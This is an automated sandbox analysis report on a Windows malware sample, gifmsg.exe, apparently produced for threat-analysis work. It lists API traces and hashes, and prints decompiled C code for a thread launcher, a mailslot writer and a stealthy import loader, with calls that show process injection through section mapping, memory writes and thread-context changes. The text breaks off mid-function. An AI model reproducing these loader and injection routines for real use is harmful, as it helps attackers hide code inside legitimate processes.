Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

Strings

D, xrefs: 002E13CE

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: gifmsg.exe Analysis ID: 60136

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	5BDD37EDD3740A4E2DA2E05ABDC20A20
Total matches:	34
Initial Analysis Report:	Open
Initial sample Analysis ID:	60136
Initial sample SHA 256:	3D61067831E54523401557F16F776796142F313F41B2B12D48B017A7E06B48DD
Initial sample name:	gifmsg.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Similarity

Total matches: 33
API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
String ID: pnls$}nls
API String ID: 315724681-4252118926
Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
CloseHandle.KERNEL32(?), ref: 002E43F8
StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
FindNextFileA.KERNELBASE(?,?), ref: 002E4486
StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
FindNextFileA.KERNELBASE(?,?), ref: 002E4542
CompareFileTime.KERNEL32(?,?), ref: 002E456B
HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1

Strings

pnls, xrefs: 002E4340, 002E4351, 002E4367, 002E4373, 002E438B, 002E4393
}nls, xrefs: 002E436C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Similarity

Total matches: 38
API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
String ID: pnls
API String ID: 82859500-141991303
Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714

APIs

Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F

memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F

Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04

memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F

Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4

Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
CloseHandle.KERNEL32(00000000), ref: 002E1EE0
memset.NTDLL ref: 002E1EF4

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

Strings

pnls, xrefs: 002E1D8C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
